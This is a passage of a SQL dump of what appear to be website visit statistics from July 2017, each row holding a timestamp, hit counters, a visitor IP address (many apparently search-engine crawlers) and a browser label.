32.33','other'),(134148,1500397116,1,1,0,0,'137.74.207.102','other'),(134149,1500398052,1,1,0,0,'217.182.132.24','other'),(134150,1500398117,1,1,0,0,'87.250.224.16','other'),(134151,1500398123,1,1,0,0,'8.29.198.26','other'),(134152,1500398566,1,1,0,0,'217.182.132.191','other'),(134153,1500399102,1,1,0,0,'216.244.66.246','other'),(134154,1500399119,2,2,0,0,'91.209.11.236','other'),(134155,1500399387,1,1,0,0,'164.132.162.154','other'),(134156,1500399451,1,1,0,0,'217.182.132.172','other'),(134157,1500399473,1,1,0,0,'216.244.66.237','other'),(134158,1500399647,1,1,0,0,'5.255.253.81','other'),(134159,1500399722,1,1,0,0,'93.158.152.60','other'),(134160,1500399954,1,1,0,0,'51.255.71.123','other'),(134161,1500399992,1,1,0,0,'95.108.179.15','other'),(134162,1500400173,1,1,0,0,'5.255.253.63','other'),(134163,1500400287,1,1,0,0,'51.255.65.17','other'),(134164,1500400646,1,1,0,0,'141.8.142.154','other'),(134165,1500400748,1,1,0,0,'87.250.224.18','other'),(134166,1500400983,1,1,0,0,'95.108.179.15','other'),(134167,1500401187,1,1,0,0,'95.108.213.34','other'),(134168,1500401937,1,1,0,0,'95.108.213.7','other'),(134169,1500402361,2,2,0,0,'95.108.213.34','other'),(134170,1500402487,3,3,0,0,'216.244.66.194','other'),(134171,1500402565,2,2,0,0,'91.209.11.236','other'),(134172,1500403246,1,1,0,0,'87.250.224.18','other'),(134173,1500403347,1,1,0,0,'66.249.76.108','chrome'),(134174,1500403370,1,1,0,0,'95.108.179.15','other'),(134175,1500403532,1,1,0,0,'51.255.65.95','other'),(134176,1500403589,1,1,0,0,'217.182.132.184','other'),(134177,1500403770,1,1,0,0,'217.182.132.68','other'),(134178,1500403874,1,1,0,0,'137.74.207.120','other'),(134179,1500404514,2,2,0,0,'91.209.11.236','other'),(134180,1500404622,1,1,0,0,'51.255.64.106','other'),(134181,1500404939,1,1,0,0,'95.108.213.34','other'),(134182,1500405204,1,1,0,0,'217.182.132.241','other'),(134183,1500405206,1,1,0,0,'87.250.224.7','other'),(134184,1500405340,1,1,0,0,'217.182.132.76','other'),(134185,1500405503,1,1,0,0,'217.182.132.31','other'),(134186,1500405505,1,1,0,0,'217.69.133.3','other'),(134187,1500405507,1,1,0,0,'217.182.132.82','other'),(134188,1500405595,1,1,0,0,'37.73.246.30','chrome'),(134189,1500405654,1,1,0,0,'40.77.167.41','other'),(134190,1500405705,2,2,0,0,'5.255.253.63','other'),(134191,1500405931,1,1,0,0,'51.255.65.39','other'),(134192,1500405935,1,1,0,0,'51.255.65.82','other'),(134193,1500405962,1,1,0,0,'217.182.132.152','other'),(134194,1500405965,1,1,0,0,'95.108.213.34','other'),(134195,1500406802,1,1,0,0,'216.244.66.246','other'),(134196,1500406882,1,1,0,0,'95.108.179.15','other'),(134197,1500406884,3,3,0,0,'91.209.11.236','other'),(134198,1500406977,1,1,0,0,'51.255.65.33','other'),(134199,1500407167,1,1,0,0,'51.255.65.90','other'),(134200,1500407366,1,1,0,0,'164.132.162.164','other'),(134201,1500407497,1,1,0,0,'37.52.31.241','chrome'),(134202,1500407664,1,1,0,0,'51.255.65.58','other'),(134203,1500407780,1,1,0,0,'137.74.207.101','other'),(134204,1500408108,1,1,0,0,'66.249.76.108','chrome'),(134205,1500408718,1,1,0,0,'51.255.65.21','other'),(134206,1500408870,1,1,0,0,'51.255.65.89','other'),(134207,1500408957,1,1,0,0,'8.29.198.26','other'),(134208,1500409175,1,1,0,0,'51.255.65.91','other'),(134209,1500409314,4,4,0,0,'69.197.179.170','firefox'),(134210,1500409317,5,5,0,0,'69.197.179.170','msie'),(134211,1500409472,1,1,0,0,'87.250.224.7','other'),(134212,1500409906,1,1,0,0,'91.209.11.236','other'),(134213,1500410268,1,0,1,0,'66.249.76.91',''),(134214,1500410433,1,1,0,0,'51.255.65.86','other'),(134215,1500410672,1,1,0,0,'51.255.65.30','other'),(134216,1500410729,1,1,0,0,'37.54.115.120','firefox'),(134217,1500410906,1,1,0,0,'5.255.253.63','other'),(134218,1500411239,1,0,1,0,'66.249.76.93',''),(134219,1500411276,1,1,0,0,'217.182.132.185','other'),(134220,1500411402,1,1,0,0,'51.255.65.61','other'),(134221,1500411452,2,2,0,0,'216.244.66.194','other'),(134222,1500412046,1,1,0,0,'164.132.162.154','other'),(134223,1500412166,1,1,0,0,'207.154.254.91','other'),(134224,1500412175,1,1,0,0,'51.255.65.93','other'),(134225,1500412179,1,1,0,0,'46.48.13.161','chrome'),(134226,1500412346,1,1,0,0,'164.132.162.187','other'),(134227,1500412760,1,1,0,0,'217.182.132.153','other'),(134228,1500413143,1,1,0,0,'217.182.132.74','other'),(134229,1500413506,1,1,0,0,'141.8.142.154','other'),(134230,1500413698,1,1,0,0,'51.255.71.133','other'),(134231,1500413886,1,1,0,0,'91.209.11.236','other'),(134232,1500414153,1,1,0,0,'95.108.213.34','other'),(134233,1500414230,2,2,0,0,'62.210.203.161','chrome'),(134234,1500414325,3,3,0,0,'95.108.179.15','other'),(134235,1500414402,1,1,0,0,'217.182.132.170','other'),(134236,1500414453,1,1,0,0,'51.255.65.83','other'),(134237,1500414681,1,1,0,0,'51.255.65.94','other'),(134238,1500415207,1,0,1,0,'66.249.76.109',''),(134239,1500415561,1,1,0,0,'216.244.66.237','other'),(134240,1500415725,1,1,0,0,'51.255.65.72','other'),(134241,1500416088,1,1,0,0,'93.158.152.79','other'),(134242,1500416384,1,1,0,0,'217.182.132.53','other'),(134243,1500416621,1,1,0,0,'180.76.15.160','other'),(134244,1500416704,1,1,0,0,'217.69.133.3','other'),(134245,1500417062,1,1,0,0,'217.182.132.56','other'),(134246,1500417161,1,1,0,0,'87.250.224.7','other'),(134247,1500417339,1,1,0,0,'217.182.132.24','other'),(134248,1500417581,2,2,0,0,'91.209.11.236','other'),(134249,1500418064,1,1,0,0,'51.255.65.70','other'),(134250,1500418120,4,4,0,0,'216.244.66.246','other'),(134251,1500418153,1,1,0,0,'141.8.142.154','other'),(134252,1500418363,1,1,0,0,'216.244.66.194','other'),(134253,1500418588,1,1,0,0,'87.250.224.18','other'),(134254,1500419297,1,1,0,0,'87.250.224.7','other'),(134255,1500419381,1,1,0,0,'91.209.11.236','other'),(134256,1500419683,1,1,0,0,'51.255.65.56','other'),(134257,1500419823,1,1,0,0,'95.108.179.15','other'),(134258,1500419845,2,2,0,0,'95.108.213.34','other'),(134259,1500420211,1,1,0,0,'51.255.65.61','other'),(134260,1500420642,1,1,0,0,'141.8.142.154','other'),(134261,1500420657,1,1,0,0,'51.255.65.63','other'),(134262,1500421008,1,1,0,0,'87.250.224.7','other'),(134263,1500421492,1,1,0,0,'51.255.65.46','other'),(134264,1500421511,1,1,0,0,'51.255.65.55','other'),(134265,1500421712,1,1,0,0,'54.165.59.7','other'),(134266,1500421886,1,1,0,0,'51.255.65.61','other'),(134267,1500422026,1,1,0,0,'216.244.66.246','other'),(134268,1500422097,1,1,0,0,'37.145.10.63','msie'),(134269,1500422643,1,1,0,0,'91.209.11.236','other'),(134270,1500422885,1,1,0,0,'180.76.15.6','other'),(134271,1500423734,1,1,0,0,'51.255.65.86','other'),(134272,1500423791,1,1,0,0,'217.69.133.9','other'),(134273,1500424500,1,1,0,0,'51.255.65.88','other'),(134274,1500424879,1,1,0,0,'91.209.11.236','other'),(134275,1500425388,1,1,0,0,'217.182.132.25','other'),(134276,1500425730,1,1,0,0,'5.255.253.63','other'),(134277,1500426127,1,1,0,0,'51.255.65.42','other'),(134278,1500426304,1,1,0,0,'216.244.66.194','other'),(134279,1500426637,1,1,0,0,'141.8.142.164','other'),(134280,1500427075,1,1,0,0,'217.182.132.31','other'),(134281,1500427216,1,1,0,0,'66.249.76.109','chrome'),(134282,1500427562,2,2,0,0,'141.8.142.154','other'),(134283,1500427782,1,1,0,0,'95.108.213.34','other'),(134284,1500428368,1,1,0,0,'137.74.203.194','other'),(134285,1500428402,1,1,0,0,'164.132.162.157','other'),(134286,1500428424,1,1,0,0,'95.108.179.15','other'),(134287,1500428556,1,1,0,0,'51.255.65.16','other'),(134288,1500428718,1,1,0,0,'217.182.132.51','other'),(134289,1500429251,1,0,1,0,'66.249.76.93',''),(134290,1500429659,1,1,0,0,'51.255.65.42','other'),(134291,1500429875,1,1,0,0,'141.8.142.154','other'),(134292,1500430434,3,3,0,0,'216.244.66.246','other'),(134293,1500430628,1,1,0,0,'51.255.65.5','other'),(134294,1500430678,1,1,0,0,'217.182.132.33','other'),(134295,1500430748,1,0,1,0,'66.249.76.108',''),(134296,1500430789,1,1,0,0,'95.108.179.15','other'),(134297,1500431040,1,1,0,0,'217.182.132.32','other'),(134298,1500431260,1,0,1,0,'66.249.66.155',''),(134299,1500431277,3,3,0,0,'216.244.66.194','other'),(134300,1500431585,1,1,0,0,'217.182.132.151','other'),(134301,1500431880,2,2,0,0,'91.209.11.236','other'),(134302,1500432443,1,1,0,0,'51.255.71.122','other'),(134303,1500432570,1,1,0,0,'217.182.132.147','other'),(134304,1500433115,1,1,0,0,'51.255.65.35','other'),(134305,1500433165,1,1,0,0,'217.182.132.83','other'),(134306,1500433579,1,1,0,0,'51.255.71.121','other'),(134307,1500433838,1,1,0,0,'195.154.177.95','chrome'),(134308,1500433979,1,1,0,0,'91.209.11.236','other'),(134309,1500434151,2,2,0,0,'216.244.66.246','other'),(134310,1500434563,1,1,0,0,'137.74.207.161','other'),(134311,1500434847,1,1,0,0,'141.8.142.164','other'),(134312,1500434938,1,1,0,0,'95.108.213.34','other'),(134313,1500435137,3,3,0,0,'54.165.59.7','other'),(134314,1500435255,2,2,0,0,'91.209.11.236','other'),(134315,1500436110,1,1,0,0,'51.255.65.93','other'),(134316,1500436594,1,1,0,0,'217.182.132.174','other'),(134317,1500436756,1,1,0,0,'217.182.132.240','other'),(134318,1500436834,1,1,0,0,'217.182.132.5','other'),(134319,1500437006,2,2,0,0,'54.165.59.7','other'),(134320,1500437128,1,1,0,0,'51.255.71.112','other'),(134321,1500437166,1,1,0,0,'217.182.132.172','other'),(134322,1500437170,1,1,0,0,'151.80.27.116','other'),(134323,1500437306,1,1,0,0,'137.74.207.110','other'),(134324,1500437341,1,1,0,0,'91.209.11.236','other'),(134325,1500437517,1,1,0,0,'93.158.152.107','other'),(134326,1500437682,1,1,0,0,'51.255.65.10','other'),(134327,1500437841,1,1,0,0,'95.108.179.15','other'),(134328,1500438005,1,1,0,0,'51.255.65.48','other'),(134329,1500438009,1,1,0,0,'217.182.132.185','other'),(134330,1500438453,3,3,0,0,'216.244.66.246','other'),(134331,1500438578,1,1,0,0,'51.255.65.14','other'),(134332,1500438838,1,1,0,0,'91.209.11.236','other'),(134333,1500439019,1,1,0,0,'216.244.66.237','other'),(134334,1500439096,1,0,1,0,'66.249.76.107',''),(134335,1500440155,1,1,0,0,'91.196.178.71','firefox'),(134336,1500440473,2,2,0,0,'216.244.66.246','other'),(134337,1500440495,1,1,0,0,'51.255.65.73','other'),(134338,1500440565,1,1,0,0,'217.182.132.84','other'),(134339,1500440622,1,1,0,0,'217.69.133.2','other'),(134340,1500440819,1,1,0,0,'91.209.11.236','other'),(134341,1500440871,1,1,0,0,'217.182.132.91','other'),(134342,1500440912,1,1,0,0,'51.255.65.16','other'),(134343,1500440983,1,1,0,0,'141.8.142.164','other'),(134344,1500441242,2,2,0,0,'51.255.46.241','other'),(134345,1500441604,1,1,0,0,'180.76.15.6','other'),(134346,1500441772,1,1,0,0,'217.182.132.19','other'),(134347,1500441872,1,1,0,0,'217.182.132.68','other'),(134348,1500441909,1,1,0,0,'194.37.248.11','firefox'),(134349,1500442113,1,1,0,0,'66.102.9.25','chrome'),(134350,1500442227,1,1,0,0,'217.182.132.50','other'),(134351,1500443217,1,1,0,0,'51.255.71.125','other'),(134352,1500443667,1,1,0,0,'5.255.253.63','other'),(134353,1500443781,1,1,0,0,'51.255.71.126','other'),(134354,1500443938,2,2,0,0,'141.8.142.154','other'),(134355,1500443972,1,1,0,0,'141.8.142.164','other'),(134356,1500444060,1,1,0,0,'217.182.132.148','other'),(134357,1500444288,1,1,0,0,'51.255.65.52','other'),(134358,1500444408,1,1,0,0,'51.255.65.18','other'),(134359,1500444822,1,1,0,0,'51.255.65.73','other'),(134360,1500444892,1,1,0,0,'91.209.11.236','other'),(134361,1500444918,1,1,0,0,'51.255.65.32','other'),(134362,1500445153,1,1,0,0,'141.8.142.164','other'),(134363,1500445673,1,1,0,0,'216.244.66.237','other'),(134364,1500446109,1,1,0,0,'217.182.132.152','other'),(134365,1500446250,1,1,0,0,'217.69.133.3','other'),(134366,1500446304,1,1,0,0,'51.255.65.81','other'),(134367,1500446518,1,1,0,0,'195.154.177.95','chrome'),(134368,1500446712,4,4,0,0,'216.244.66.194','other'),(134369,1500446834,1,1,0,0,'216.244.66.246','other'),(134370,1500446966,1,1,0,0,'137.74.207.116','other'),(134371,1500447005,1,1,0,0,'87.250.224.7','other'),(134372,1500447080,1,1,0,0,'141.8.142.164','other'),(134373,1500447537,1,1,0,0,'46.219.2.11','opera'),(134374,1500447655,1,1,0,0,'87.250.224.18','other'),(134375,1500447868,1,1,0,0,'188.166.25.25','firefox'),(134376,1500448077,1,1,0,0,'217.182.132.95','other'),(134377,1500448559,1,1,0,0,'51.255.71.129','other'),(134378,1500448823,1,1,0,0,'95.108.213.34','other'),(134379,1500449019,1,1,0,0,'92.113.77.192','firefox'),(134380,1500449138,1,1,0,0,'51.255.65.5','other'),(134381,1500449206,2,2,0,0,'141.8.142.154','other'),(134382,1500449324,1,1,0,0,'91.196.178.67','firefox'),(134383,1500449444,1,1,0,0,'217.182.132.149','other'),(134384,1500449482,2,2,0,0,'91.124.94.172','chrome'),(134385,1500449756,1,1,0,0,'217.182.132.184','other'),(134386,1500449813,1,1,0,0,'51.255.65.43','other'),(134387,1500449857,1,1,0,0,'51.255.65.45','other'),(134388,1500449867,1,0,1,0,'68.180.230.48',''),(134389,1500450050,1,1,0,0,'87.250.224.7','other'),(134390,1500450517,1,1,0,0,'51.255.65.15','other'),(134391,1500451017,1,1,0,0,'217.182.132.192','other'),(134392,1500451615,1,0,1,0,'66.249.76.93',''),(134393,1500451641,1,1,0,0,'91.196.178.66','chrome'),(134394,1500451825,1,1,0,0,'95.108.179.15','other'),(134395,1500452098,3,3,0,0,'216.244.66.246','other'),(134396,1500452296,1,1,0,0,'51.255.65.69','other'),(134397,1500452390,1,1,0,0,'217.182.132.180','other'),(134398,1500452526,1,1,0,0,'51.255.65.32','other'),(134399,1500452730,2,2,0,0,'87.250.224.7','other'),(134400,1500452856,1,1,0,0,'51.255.65.73','other'),(134401,1500452905,1,1,0,0,'217.182.132.77','other'),(134402,1500453019,1,1,0,0,'91.196.178.167','chrome'),(134403,1500453427,1,1,0,0,'91.196.178.37','chrome'),(134404,1500453494,1,1,0,0,'207.46.13.28','other'),(134405,1500453749,1,1,0,0,'95.133.60.169','firefox'),(134406,1500453766,1,1,0,0,'51.255.65.56','other'),(134407,1500453809,1,1,0,0,'37.55.220.3','chrome'),(134408,1500454129,2,2,0,0,'216.244.66.194','other'),(134409,1500454153,1,1,0,0,'51.255.71.127','other'),(134410,1500454682,1,1,0,0,'51.255.65.20','other'),(134411,1500454775,1,1,0,0,'46.201.168.54','chrome'),(134412,1500455155,1,1,0,0,'95.108.179.15','other'),(134413,1500455233,1,1,0,0,'217.182.132.187','other'),(134414,1500455252,1,1,0,0,'51.255.71.125','other'),(134415,1500455270,1,1,0,0,'141.8.142.164','other'),(134416,1500455338,1,1,0,0,'141.8.142.154','other'),(134417,1500455525,1,1,0,0,'93.74.212.147','firefox'),(134418,1500455785,1,1,0,0,'95.108.213.34','other'),(134419,1500455793,1,1,0,0,'157.55.39.179','other'),(134420,1500455845,1,1,0,0,'217.182.132.156','other'),(134421,1500456110,1,1,0,0,'51.255.65.71','other'),(134422,1500456366,1,1,0,0,'8.29.198.26','other'),(134423,1500456483,1,1,0,0,'51.255.65.52','other'),(134424,1500456653,1,1,0,0,'91.196.178.164','chrome'),(134425,1500456692,4,4,0,0,'87.250.224.7','other'),(134426,1500456800,1,1,0,0,'217.69.133.203','other'),(134427,1500456863,1,1,0,0,'91.209.11.236','other'),(134428,1500457021,1,1,0,0,'216.244.66.194','other'),(134429,1500457129,1,1,0,0,'216.244.66.246','other'),(134430,1500457299,1,1,0,0,'95.108.213.34','other'),(134431,1500457310,1,1,0,0,'5.255.253.63','other'),(134432,1500457486,1,1,0,0,'217.69.133.3','other'),(134433,1500457620,1,1,0,0,'104.40.57.233','firefox'),(134434,1500458474,1,1,0,0,'66.249.76.91','chrome'),(134435,1500458492,1,1,0,0,'217.69.133.2','other'),(134436,1500458621,1,1,0,0,'162.210.196.130','other'),(134437,1500458777,1,1,0,0,'51.255.65.56','other'),(134438,1500458872,1,1,0,0,'91.196.178.69','firefox'),(134439,1500458955,1,1,0,0,'204.13.201.137','msie'),(134440,1500458978,1,1,0,0,'77.247.181.165','msie'),(134441,1500459024,1,1,0,0,'141.8.142.154','other'),(134442,1500459303,1,1,0,0,'45.55.224.77','msie'),(134443,1500459411,1,1,0,0,'51.255.65.13','other'),(134444,1500459860,2,2,0,0,'95.108.179.15','other'),(134445,1500459956,1,1,0,0,'51.255.65.28','other'),(134446,1500460074,1,1,0,0,'51.255.65.17','other'),(134447,1500460261,1,1,0,0,'93.72.41.79','chrome'),(134448,1500460609,1,1,0,0,'141.8.142.164','other'),(134449,1500460920,1,1,0,0,'51.255.65.76','other'),(134450,1500461080,1,1,0,0,'137.74.207.120','other'),(134451,1500461219,2,2,0,0,'216.244.66.194','other'),(134452,1500461239,1,1,0,0,'95.108.213.34','other'),(134453,1500461297,1,0,1,0,'66.249.76.137',''),(134454,1500461547,1,0,1,0,'66.249.66.16',''),(134455,1500461723,1,1,0,0,'91.196.177.46','chrome'),(134456,1500461771,1,1,0,0,'217.182.132.50','other'),(134457,1500461981,1,1,0,0,'51.255.65.4','other'),(134458,1500462042,1,1,0,0,'137.74.207.114','other'),(134459,1500462373,1,1,0,0,'51.255.65.22','other'),(134460,1500462554,1,1,0,0,'217.182.132.185','other'),(134461,1500462646,1,1,0,0,'51.255.65.76','other'),(134462,1500462933,1,1,0,0,'95.108.213.34','other'),(134463,1500463117,1,1,0,0,'217.69.133.3','other'),(134464,1500463186,1,1,0,0,'95.108.213.7','other'),(134465,1500463332,1,1,0,0,'141.8.142.164','other'),(134466,1500463605,1,1,0,0,'87.250.224.7','other'),(134467,1500463764,2,2,0,0,'95.108.179.15','other'),(134468,1500464032,1,1,0,0,'91.209.11.236','other'),(134469,1500464285,1,1,0,0,'51.255.65.62','other'),(134470,1500464334,1,1,0,0,'130.180.216.231','chrome'),(134471,1500464441,1,1,0,0,'216.244.66.194','other'),(134472,1500465017,1,1,0,0,'216.244.66.246','other'),(134473,1500465113,1,1,0,0,'217.182.132.185','other'),(134474,1500465139,1,1,0,0,'51.255.65.64','other'),(134475,1500465237,1,1,0,0,'217.182.132.27','other'),(134476,1500465565,1,1,0,0,'5.255.253.63','other'),(134477,1500465865,1,1,0,0,'194.187.218.146','chrome'),(134478,1500466050,1,1,0,0,'217.182.132.240','other'),(134479,1500466129,1,1,0,0,'195.230.130.105','chrome'),(134480,1500466574,1,1,0,0,'87.250.224.18','other'),(134481,1500466679,1,1,0,0,'217.182.132.52','other'),(134482,1500466869,1,1,0,0,'51.255.71.127','other'),(134483,1500466983,1,1,0,0,'217.182.132.182','other'),(134484,1500467129,2,0,2,0,'66.249.76.131',''),(134485,1500467221,3,3,0,0,'87.250.224.7','other'),(134486,1500467350,1,0,1,0,'66.249.66.18',''),(134487,1500467444,1,1,0,0,'217.182.132.154','other'),(134488,1500467454,1,0,1,0,'66.249.66.20',''),(134489,1500467481,1,1,0,0,'51.255.65.52','other'),(134490,1500467640,1,1,0,0,'51.255.65.70','other'),(134491,1500467648,1,1,0,0,'213.108.47.17','chrome'),(134492,1500467670,1,1,0,0,'217.182.132.72','other'),(134493,1500468108,1,1,0,0,'37.55.203.69','chrome'),(134494,1500468113,1,1,0,0,'217.182.132.60','other'),(134495,1500468119,1,1,0,0,'217.69.133.6','other'),(134496,1500468120,1,1,0,0,'217.69.133.3','other'),(134497,1500468176,1,0,1,0,'66.249.66.16',''),(134498,1500468687,1,1,0,0,'141.8.142.154','other'),(134499,1500468690,1,1,0,0,'95.108.213.34','other'),(134500,1500468809,1,1,0,0,'217.182.132.71','other'),(134501,1500469208,1,1,0,0,'91.209.11.236','other'),(134502,1500469504,1,1,0,0,'137.74.201.100','other'),(134503,1500469603,1,1,0,0,'217.182.132.17','other'),(134504,1500469711,1,1,0,0,'87.250.224.7','other'),(134505,1500469930,1,1,0,0,'95.108.213.34','other'),(134506,1500469950,1,1,0,0,'217.69.133.203','other'),(134507,1500469951,1,1,0,0,'141.8.142.164','other'),(134508,1500470228,1,1,0,0,'95.108.179.15','other'),(134509,1500470295,1,1,0,0,'141.8.142.154','other'),(134510,1500470390,1,1,0,0,'217.182.132.156','other'),(134511,1500470796,2,2,0,0,'216.244.66.194','other'),(134512,1500470971,1,1,0,0,'217.182.132.150','other'),(134513,1500471053,1,1,0,0,'217.182.132.148','other'),(134514,1500471144,1,1,0,0,'141.8.142.164','other'),(134515,1500471404,2,2,0,0,'216.244.66.246','other'),(134516,1500471506,1,0,1,0,'66.249.76.137',''),(134517,1500471664,1,1,0,0,'95.108.213.34','other'),(134518,1500471678,1,1,0,0,'51.255.64.106','other'),(134519,1500471795,1,1,0,0,'217.182.132.64','other'),(134520,1500471958,1,1,0,0,'157.55.39.181','other'),(134521,1500472056,1,1,0,0,'87.250.224.7','other'),(134522,1500472082,1,0,1,0,'66.249.66.20',''),(134523,1500472182,1,1,0,0,'141.8.142.154','other'),(134524,1500472206,1,1,0,0,'91.196.178.67','firefox'),(134525,1500472317,1,1,0,0,'217.182.132.28','other'),(134526,1500472414,1,1,0,0,'217.182.132.181','other'),(134527,1500472482,1,0,1,0,'66.249.76.89',''),(134528,1500472646,1,1,0,0,'217.182.132.76','other'),(134529,1500472680,1,1,0,0,'178.140.84.44','msie'),(134530,1500472784,1,1,0,0,'51.255.65.93','other'),(134531,1500472795,1,1,0,0,'141.8.142.38','other'),(134532,1500473548,1,1,0,0,'141.8.142.164','other'),(134533,1500473563,2,2,0,0,'62.210.203.161','chrome'),(134534,1500473928,1,1,0,0,'95.108.179.15','other'),(134535,1500474135,1,1,0,0,'217.182.132.96','other'),(134536,1500474269,3,0,3,0,'66.249.76.89',''),(134537,1500474300,1,1,0,0,'87.250.224.7','other'),(134538,1500474485,1,1,0,0,'87.250.224.18','other'),(134539,1500474491,1,1,0,0,'51.255.71.113','other'),(134540,1500474526,1,1,0,0,'217.182.132.81','other'),(134541,1500474872,1,1,0,0,'217.182.132.178','other'),(134542,1500474926,2,2,0,0,'91.209.11.236','other'),(134543,1500474966,1,1,0,0,'51.255.65.81','other'),(134544,1500475199,2,2,0,0,'216.244.66.194','other'),(134545,1500475274,2,2,0,0,'216.244.66.246','other'),(134546,1500475369,1,1,0,0,'195.211.175.37','chrome'),(134547,1500475413,2,2,0,0,'62.210.203.161','chrome'),(134548,1500475589,1,1,0,0,'195.154.251.162','chrome'),(134549,1500475613,1,1,0,0,'95.108.179.15','other'),(134550,1500475829,1,1,0,0,'95.108.213.34','other'),(134551,1500476263,1,1,0,0,'5.255.253.63','other'),(134552,1500476355,1,0,1,0,'66.249.76.137',''),(134553,1500477034,1,1,0,0,'46.211.66.12','chrome'),(134554,1500477236,1,1,0,0,'8.29.198.26','other'),(134555,1500477351,1,1,0,0,'178.255.215.94','other'),(134556,1500477356,1,1,0,0,'95.108.179.15','other'),(134557,1500477381,1,1,0,0,'51.255.71.113','other'),(134558,1500477383,1,1,0,0,'141.8.142.164','other'),(134559,1500477472,1,1,0,0,'217.182.132.81','other'),(134560,1500477713,2,2,0,0,'91.209.11.236','other'),(134561,1500477809,1,1,0,0,'195.154.177.95','chrome'),(134562,1500478086,1,1,0,0,'157.55.39.93','other'),(134563,1500478180,1,1,0,0,'66.249.66.25','chrome'),(134564,1500478501,1,1,0,0,'217.182.132.172','other'),(134565,1500478647,1,1,0,0,'141.8.142.164','other'),(134566,1500479794,1,0,1,0,'66.249.66.157',''),(134567,1500479863,1,0,1,0,'66.249.66.156',''),(134568,1500480257,1,1,0,0,'66.249.66.155','chrome'),(134569,1500480592,1,1,0,0,'51.255.65.56','other'),(134570,1500480901,2,2,0,0,'216.244.66.246','other'),(134571,1500481142,1,1,0,0,'217.182.132.65','other'),(134572,1500481175,1,1,0,0,'95.108.179.15','other'),(134573,1500481346,1,1,0,0,'87.250.224.7','other'),(134574,1500482005,1,1,0,0,'217.182.132.156','other'),(134575,1500482189,1,0,1,0,'66.249.66.16',''),(134576,1500482347,3,3,0,0,'91.209.11.236','other'),(134577,1500482605,1,0,1,0,'66.249.66.76',''),(134578,1500482756,2,2,0,0,'87.250.224.7','other'),(134579,1500482833,1,1,0,0,'141.8.142.154','other'),(134580,1500483125,1,1,0,0,'5.255.253.63','other'),(134581,1500483167,1,0,1,0,'66.249.66.75',''),(134582,1500483170,1,0,1,0,'66.249.66.74',''),(134583,1500483195,1,1,0,0,'51.255.65.92','other'),(134584,1500483248,1,1,0,0,'51.255.65.32','other'),(134585,1500483309,1,1,0,0,'217.182.132.30','other'),(134586,1500483312,1,1,0,0,'40.77.167.33','other'),(134587,1500483314,1,1,0,0,'51.255.71.127','other'),(134588,1500483436,1,1,0,0,'51.255.65.38','other'),(134589,1500483800,1,1,0,0,'91.209.11.236','other'),(134590,1500484237,1,0,1,0,'66.249.66.157',''),(134591,1500484460,1,1,0,0,'37.73.251.203','chrome'),(134592,1500485429,1,1,0,0,'141.8.142.154','other'),(134593,1500485441,1,0,1,0,'66.249.66.157',''),(134594,1500485458,2,2,0,0,'95.108.179.15','other'),(134595,1500485604,1,1,0,0,'40.77.167.33','other'),(134596,1500485808,1,1,0,0,'91.196.178.161','chrome'),(134597,1500485962,1,1,0,0,'87.250.224.7','other'),(134598,1500486106,1,0,1,0,'66.249.66.155',''),(134599,1500486118,1,1,0,0,'217.182.132.29','other'),(134600,1500486212,1,1,0,0,'137.74.207.161','other'),(134601,1500486324,1,1,0,0,'51.255.65.23','other'),(134602,1500486514,2,2,0,0,'141.8.142.154','other'),(134603,1500486995,1,1,0,0,'51.255.65.59','other'),(134604,1500487072,1,1,0,0,'91.209.11.236','other'),(134605,1500487084,1,1,0,0,'95.108.213.7','other'),(134606,1500487164,1,1,0,0,'217.182.132.25','other'),(134607,1500487439,1,1,0,0,'107.150.59.98','other'),(134608,1500487636,1,1,0,0,'51.255.65.75','other'),(134609,1500487731,1,1,0,0,'217.182.132.56','other'),(134610,1500487998,1,1,0,0,'95.108.179.15','other'),(134611,1500488058,6,6,0,0,'216.244.66.246','other'),(134612,1500488113,1,1,0,0,'164.132.162.159','other'),(134613,1500488214,1,1,0,0,'178.154.200.37','other'),(134614,1500488606,1,1,0,0,'8.29.198.25','other'),(134615,1500488866,2,1,1,0,'66.249.66.157',''),(134616,1500489256,1,1,0,0,'217.182.132.240','other'),(134617,1500489308,1,1,0,0,'95.108.179.15','other'),(134618,1500489338,1,1,0,0,'217.182.132.5','other'),(134619,1500489585,1,1,0,0,'91.209.11.236','other'),(134620,1500489644,1,0,1,0,'66.249.66.74',''),(134621,1500489698,1,1,0,0,'51.255.65.49','other'),(134622,1500489796,1,1,0,0,'217.182.132.16','other'),(134623,1500489951,1,1,0,0,'217.182.132.86','other'),(134624,1500490136,1,1,0,0,'137.74.207.114','other'),(134625,1500490468,1,0,1,0,'66.249.66.156',''),(134626,1500490607,1,0,1,0,'66.249.66.157',''),(134627,1500490965,1,1,0,0,'217.182.132.56','other'),(134628,1500490998,2,2,0,0,'91.209.11.236','other'),(134629,1500491114,1,1,0,0,'66.102.9.134','chrome'),(134630,1500491255,1,1,0,0,'217.69.133.2','other'),(134631,1500491434,2,2,0,0,'81.7.9.180','chrome'),(134632,1500491502,1,1,0,0,'66.249.66.76','chrome'),(134633,1500491524,1,0,1,0,'66.249.66.75',''),(134634,1500491571,1,1,0,0,'66.249.66.75','chrome'),(134635,1500491577,1,1,0,0,'195.154.251.162','chrome'),(134636,1500491609,2,2,0,0,'95.108.179.15','other'),(134637,1500491770,1,1,0,0,'51.255.65.46','other'),(134638,1500491822,1,1,0,0,'217.182.132.147','other'),(134639,1500492192,1,1,0,0,'66.249.66.156','chrome'),(134640,1500492237,1,1,0,0,'151.80.27.118','other'),(134641,1500492258,1,1,0,0,'157.55.39.181','other'),(134642,1500492426,1,1,0,0,'51.255.65.68','other'),(134643,1500492623,1,1,0,0,'217.182.132.94','other'),(134644,1500492694,1,1,0,0,'217.182.132.55','other'),(134645,1500492840,1,1,0,0,'66.249.66.155','chrome'),(134646,1500493235,1,1,0,0,'141.8.142.164','other'),(134647,1500493413,1,1,0,0,'216.244.66.246','other'),(134648,1500493480,1,0,1,0,'66.249.66.157',''),(134649,1500493485,1,1,0,0,'91.209.11.236','other'),(134650,1500493521,1,1,0,0,'217.182.132.23','other'),(134651,1500493688,1,1,0,0,'51.255.65.11','other'),(134652,1500494254,1,1,0,0,'217.182.132.241','other'),(134653,1500494496,2,2,0,0,'216.244.66.194','other'),(134654,1500494798,1,1,0,0,'141.8.142.164','other'),(134655,1500495148,1,1,0,0,'91.209.11.236','other'),(134656,1500495270,1,1,0,0,'51.255.65.75','other'),(134657,1500495306,1,1,0,0,'217.182.132.71','other'),(134658,1500495333,1,1,0,0,'51.255.65.25','other'),(134659,1500495438,1,1,0,0,'195.154.177.95','chrome'),(134660,1500495918,1,0,1,0,'66.249.66.156',''),(134661,1500496110,1,1,0,0,'51.255.65.49','other'),(134662,150049